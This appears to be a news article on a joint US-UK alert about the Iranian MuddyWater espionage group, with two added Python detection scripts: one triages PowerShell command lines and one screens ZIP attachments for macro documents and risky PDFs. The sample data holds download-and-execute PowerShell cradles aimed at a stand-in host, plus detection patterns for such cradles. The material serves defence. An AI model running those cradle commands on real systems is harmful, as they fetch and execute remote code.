CISA Issues MuddyWater Warning


Authorities in the UK and United States have issued an alert regarding a group of Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater.

The actors, who are also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, have been observed conducting cyber espionage and other malicious cyber operations in Asia, Africa, Europe and North America.

A joint alert issued on Thursday by CISA, the FBI, NSA, US Cyber Command Cyber National Mission Force and the UK’s National Cyber Security Centre, warned that MuddyWater has been targeting a range of government and private sector organizations across multiple industries including telecommunications, defense, local government and oil and natural gas.

Since approximately 2018, MuddyWater has conducted broad cyber campaigns under the auspices of the Iranian Ministry of Intelligence and Security (MOIS), providing stolen data and accesses both to the Iranian government and other malicious cyber actors.

"MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware," states the alert. 

"These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs) – to trick legitimate programs into running malware – and obfuscating PowerShell scripts to hide command and control (C2) functions."
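The DLL side-loading and obfuscated-PowerShell persistence the alert describes is what defenders most often catch in process-creation telemetry. The following Python script is an added example, not code from the CISA alert or from this article: it decodes PowerShell `-EncodedCommand` arguments (base64 over UTF-16LE, the encoding PowerShell itself expects for that flag, including the abbreviated forms `-e`, `-ec`, `-enc`) and flags common obfuscation and download-cradle indicators across a few constructed command lines. The log lines, the `example.invalid` URLs and the indicator names are illustrative assumptions, not observed MuddyWater artifacts.

```python
"""Triage PowerShell command lines for encoded and obfuscated payloads.

Added example; not from the CISA alert or the article. All sample log
lines are constructed for illustration.
"""
import base64
import re

# Constructed sample: build an encoded command the way an attacker (or
# PowerShell itself) would: UTF-16LE text, then base64.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    # benign administrative use
    'CommandLine: powershell.exe -File C:\\scripts\\backup.ps1',
    # hidden window, no profile, base64-encoded body
    f'CommandLine: powershell.exe -nop -w hidden -enc {_ENCODED}',
    # plaintext download cradle with string-concatenation obfuscation
    'CommandLine: powershell.exe -c "$u=\'http://exa\'+\'mple.invalid/x\'; IEX((New-Object Net.WebClient).DownloadString($u))"',
    # unrelated process
    'CommandLine: C:\\Windows\\System32\\notepad.exe C:\\Users\\bob\\notes.txt',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec).
_ENC_FLAGS = ["encodedcommand"[:n] for n in range(1, 15)] + ["ec"]
_ENC_RE = re.compile(
    r"(?<![\w-])-(?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Indicator names are our own labels (assumption), not a vendor taxonomy.
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop[a-z]*\b", re.IGNORECASE),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
        r"invoke-restmethod|\biwr\b|start-bitstransfer",
        re.IGNORECASE,
    ),
    "string_concat": re.compile(r"'\s*\+\s*'"),
    "base64_in_script": re.compile(r"frombase64string", re.IGNORECASE),
    "char_code": re.compile(r"\[char\]\s*\d+", re.IGNORECASE),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyze(cmdline):
    """Indicators found in one command line; decoded payload scanned too."""
    found = set()
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        found.add("encoded_command")
        text = cmdline + "\n" + decoded
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            found.add(name)
    return {"indicators": sorted(found), "decoded": decoded}


def triage(log_lines, min_indicators=2):
    """Return PowerShell command lines with at least min_indicators hits."""
    hits = []
    for i, line in enumerate(log_lines):
        lower = line.lower()
        if "powershell" not in lower and "pwsh" not in lower:
            continue
        result = analyze(line)
        if len(result["indicators"]) >= min_indicators:
            hits.append({"line": i, **result})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOGS):
        print(hit["line"], hit["indicators"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The threshold of two indicators is a starting point to tune against your own baseline: `-EncodedCommand` alone is common in legitimate management tooling, so the script weights the combination (hidden window, no profile, a decoded body that calls a download cradle into `IEX`) rather than any single flag.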

Recently, MuddyWater actors have been spotted using multiple malware sets including PowGoop, Small Sieve, Canopy/Starwhale, Mori and POWERSTATS for loading malware, backdoor access, persistence and exfiltration.

The APT actors have also attempted to gain access to sensitive government and commercial networks through a spearphishing campaign that coaxes victims into downloading ZIP files. Victims unwittingly download either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file onto the victim’s network.
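The delivery chain described above (a ZIP attachment carrying either a macro-enabled Excel workbook or a PDF that drops a further file) can be screened at the mail gateway before anything is opened. The following Python script is an added example, not code from the alert or this article: it unpacks a ZIP attachment in memory, reports Office Open XML documents that embed a VBA project (the `xl/vbaProject.bin` member and its Word and PowerPoint equivalents), and runs a pdfid-style keyword scan on PDFs for auto-action and embedded-file markers. The archive, the workbook members and the PDF bytes are constructed inline for illustration, and the file names are assumptions.

```python
"""Static screening of a ZIP attachment for macro documents and risky PDFs.

Added example; not from the CISA alert or the article. The archive is
constructed in code so the check runs offline.
"""
import io
import re
import zipfile

# Office Open XML packages that embed VBA macros keep the project here.
VBA_MEMBERS = {"xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin"}
# Only OOXML (zip-based) formats are inspected; legacy OLE2 .xls/.doc are not.
OFFICE_EXT = (".xlsm", ".xlsx", ".xltm", ".docm", ".docx", ".pptm", ".pptx")

# pdfid-style names that trigger actions or carry embedded payloads.
_PDF_RISKY = re.compile(rb"/(OpenAction|AA|JavaScript|JS|Launch|EmbeddedFile)\b")

# Constructed PDF fragment: auto-opens and launches a file (illustrative).
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /Launch /F (payload.exe) >> endobj\n"
    b"%%EOF\n"
)


def _zip_bytes(members):
    """Build a ZIP archive in memory from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_attachment():
    """Constructed lure: a ZIP holding a macro workbook, a clean one, a PDF."""
    macro_workbook = _zip_bytes({
        "[Content_Types].xml": b"<Types/>",
        "xl/workbook.xml": b"<workbook/>",
        "xl/vbaProject.bin": b"\xd0\xcf\x11\xe0 constructed stand-in for a VBA project",
    })
    clean_workbook = _zip_bytes({
        "[Content_Types].xml": b"<Types/>",
        "xl/workbook.xml": b"<workbook/>",
    })
    return _zip_bytes({
        "invoice.xlsm": macro_workbook,
        "report.xlsx": clean_workbook,
        "readme.pdf": SAMPLE_PDF,
        "notes.txt": b"plain text",
    })


def office_has_macros(data):
    """True if an OOXML document contains a VBA project member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as doc:
            return any(name in VBA_MEMBERS for name in doc.namelist())
    except zipfile.BadZipFile:
        return False


def pdf_indicators(data):
    """Sorted list of risky PDF names found by raw substring scan.

    Limitation (as with pdfid): names hidden with hex escapes such as
    /#4Aavascript, or inside compressed object streams, are not seen.
    """
    return sorted({m.decode("ascii") for m in _PDF_RISKY.findall(data)})


def scan_zip_attachment(data, max_members=50):
    """Return [(member_name, verdict)] for each file in the ZIP attachment."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist()[:max_members]:
            name = info.filename
            lower = name.lower()
            if lower.endswith(OFFICE_EXT):
                verdict = "office_with_macros" if office_has_macros(zf.read(name)) else "office_no_macros"
            elif lower.endswith(".pdf"):
                verdict = "pdf_suspicious" if pdf_indicators(zf.read(name)) else "pdf_clean"
            else:
                verdict = "other"
            findings.append((name, verdict))
    return findings


if __name__ == "__main__":
    for name, verdict in scan_zip_attachment(build_sample_attachment()):
        print(f"{name}: {verdict}")
```

The macro check is by content rather than by extension, so a macro project inside a file renamed to `.xlsx` is still reported; `max_members` caps the work done on a deliberately oversized archive. Neither check proves a file is malicious, but both give a gateway or analyst a reason to hold the attachment for a closer look.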

James McQuiggan, security awareness advocate at KnowBe4, advised email users to "conduct a quick checklist of 'Do I know this person,' 'Am I expecting this email,' 'Is the request unusual and unlike the sender' and 'Is there a sense of urgency' to the request?"

He added: "Answering these questions unfavorably should trigger the user to examine the email a little closer and report to their IT or InfoSec teams."
